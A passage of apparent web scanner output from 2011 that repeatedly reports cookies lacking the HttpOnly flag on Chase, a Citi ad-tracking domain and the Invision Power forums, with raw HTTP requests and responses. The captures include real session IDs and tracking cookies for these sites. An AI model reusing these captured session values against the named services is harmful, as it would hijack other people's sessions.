A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0; ActivityInfo=000p81bBo%5f; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=8A02CA39CD9313C4; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /auth/login.aspx HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 4559 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=8A02CA39CD9313C4; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:02:00 GMT Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=CA1D7D273B8AF772; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /chaseonline/reidentify/sso_reidentify.jsp HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Length: 167 Content-Type: text/html; charset=utf-8 Expires: -1 Location: /Public/Reidentify/ReidentifyFilterView.aspx Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=CA1D7D273B8AF772; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:01:53 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fPublic%2fReidentify%2fReidentifyFilterView.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=6C9A73F2B86FE9ED; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/Reporting.js HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=86400 Content-Length: 70473 Content-Type: application/x-javascript Content-Location: https://chaseonline.chase.com/js/Reporting.js Last-Modified: Mon, 06 Dec 2010 18:24:12 GMT Accept-Ranges: bytes ETag: "02ebcc77295cb1:51e6" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=6C9A73F2B86FE9ED; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:01:52 GMT Connection: close
var CHASE=CHASE||{};CHASE.analytics=(function(){var analyticsConfig=new(function Config(){this.Enabled=true;this.PageDotPathSet=false;this.Initialized=false;this.DelayTag=false;this.DebugMode=true;th ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/c/?BT_BCID=249224&BT_SID=101294&_u=visitor&_d=http%3A%2F%2Fwww%2Eciti%2Ecom HTTP/1.1 Host: citi.bridgetrack.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASB9=TX=1296683998&Pb=0&A=8&SID=A45E875EFD344FED80EE0CD08C0895C9&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79433&Cr=98745&W=41062&Tr=41062&Cp=4112&P=285778&B=9; ATV9=5153dU6T0Ec1c40Gc8N2Iccc30DPc2DI9cc1836c8ccc1836ccccc; CitiBT%5F1=GUID=AC51251795744B1CB850CA9CB046EBD8; VCC9=; AdData=S5C=1&S3C=1&S4=95408z285779&S4T=201102021659580798&S1C=1&S2=98501z285777&S2T=201102021659550183&S1T=201101282216000635&S1=98231z612428&S3T=201102021659580502&S3=98745z285778&S2C=1&S5T=201102021659590042&S5=92846z285780&S4C=1; ASB1=TX=1296683995&Pb=0&A=8&SID=2B93505C44C8494485182E450B631A65&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; VCC1=; ATV1=21845dU6T0Bc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E; CitiBT%5F9=;
Response
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 0 Content-Type: text/html Expires: Tue, 01 Feb 2011 22:09:48 GMT Location: /cbol/_redir.htm?_u=visitor&_d=http://www.citi.com&BTData=402177D7961617455514C45BEBEBEA6A09C928496F1FCF2E9EAC5C2DEA911D83&BT_AS=8&BT_CON=1&BT_TRF=40735&lid=ILC-1110102&cmp=ILC-1110102&venue=citi.com&placement=Topper&product=BusinessChecking&promotion=Q1 Server: P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml" Set-Cookie: CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E; path=/ Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/ Date: Wed, 02 Feb 2011 22:09:48 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/s/?BT_PID=285777&BT_CON=1&BT_PM=1&r=0.13228369411081076&_u=visitor&_d=http://www.citi.com HTTP/1.1 Host: citi.bridgetrack.com Proxy-Connection: keep-alive Referer: http://www.citi.com/domain/home.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBT%5F9=
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: application/x-javascript Expires: Tue, 01 Feb 2011 21:59:55 GMT Vary: Accept-Encoding Server: P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml" Set-Cookie: ATV1=21845dU6T0Bc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: VCC1=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/ Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/ Set-Cookie: AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021659550183&S2=98501z285777&S1C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/ Set-Cookie: ASB1=TX=1296683995&Pb=0&A=8&SID=2B93505C44C8494485182E450B631A65&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E; path=/ Date: Wed, 02 Feb 2011 21:59:54 GMT Connection: close Content-Length: 2698
var bt_ad_content285777=true; function BTWrite(s) { document.write(s); } function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/s/?BT_PID=285778&BT_CON=1&BT_PM=1&r=0.5880183172412217&_u=visitor&_d=http://www.citi.com HTTP/1.1 Host: citi.bridgetrack.com Proxy-Connection: keep-alive Referer: http://www.citi.com/domain/home.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CitiBT%5F9=; ATV1=21845dU6T0Bc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021659550183&S2=98501z285777&S1C=1; ASB1=TX=1296683995&Pb=0&A=8&SID=2B93505C44C8494485182E450B631A65&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: application/x-javascript Expires: Tue, 01 Feb 2011 21:59:58 GMT Vary: Accept-Encoding Server: P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml" Set-Cookie: AdData=S3C=1&S1C=1&S2=98501z285777&S2T=201102021659550183&S1T=201101282216000635&S1=98231z612428&S3T=201102021659580502&S3=98745z285778&S2C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/ Set-Cookie: ASB9=TX=1296683998&Pb=0&A=8&SID=A45E875EFD344FED80EE0CD08C0895C9&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79433&Cr=98745&W=41062&Tr=41062&Cp=4112&P=285778&B=9; expires=Sat, 05-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/ Set-Cookie: ATV9=5153dU6T0Ec1c40Gc8N2Iccc30DPc2DI9cc1836c8ccc1836ccccc; expires=Sat, 05-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: VCC9=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/ Set-Cookie: CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E; path=/ Date: Wed, 02 Feb 2011 21:59:58 GMT Connection: close Content-Length: 2652
var bt_ad_content285778=true; function BTWrite(s) { document.write(s); } function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /track/?id=28258&random=0.5033922649454325 HTTP/1.1 Host: citi.bridgetrack.com Proxy-Connection: keep-alive Referer: http://www.citi.com/domain/home.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CitiBT%5F9=; ATV1=21845dU6T0Bc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc; ASB1=TX=1296683995&Pb=0&A=8&SID=2B93505C44C8494485182E450B631A65&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; ASB9=TX=1296683998&Pb=0&A=8&SID=A45E875EFD344FED80EE0CD08C0895C9&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79433&Cr=98745&W=41062&Tr=41062&Cp=4112&P=285778&B=9; ATV9=5153dU6T0Ec1c40Gc8N2Iccc30DPc2DI9cc1836c8ccc1836ccccc; AdData=S5C=1&S3C=1&S4=95408z285779&S4T=201102021659580798&S1C=1&S2=98501z285777&S2T=201102021659550183&S1T=201101282216000635&S1=98231z612428&S3T=201102021659580502&S3=98745z285778&S2C=1&S5T=201102021659590042&S5=92846z285780&S4C=1; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Length: 43 Content-Type: image/GIF Expires: Tue, 01 Feb 2011 21:59:59 GMT Server: P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml" Set-Cookie: CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E; path=/ Set-Cookie: CitiBT%5F1=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/ Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/ Date: Wed, 02 Feb 2011 21:59:58 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p/swfobject/ HTTP/1.1 Host: code.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /files/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /files/file/3936-ipdownloads-file-version-in-support-topic-title/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /files/file/3937-peace/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /files/file/3939-vietnamese-3xx-lang/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /files/file/3940-dp31-ihost/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /files/file/3941-vanilla-valentine/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /files/file/3942-sos31-file-version-in-online-list/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /files/file/3943-speed/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /files/file/3944-ipchat-12-turkish-language-pack/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.php?app=forums&module=forums§ion=markasread&marktype=forum&forumid=1&returntoforumid=0&i=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /resources/documentation/index.html/_/documentation/getting-started/installation-r17 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
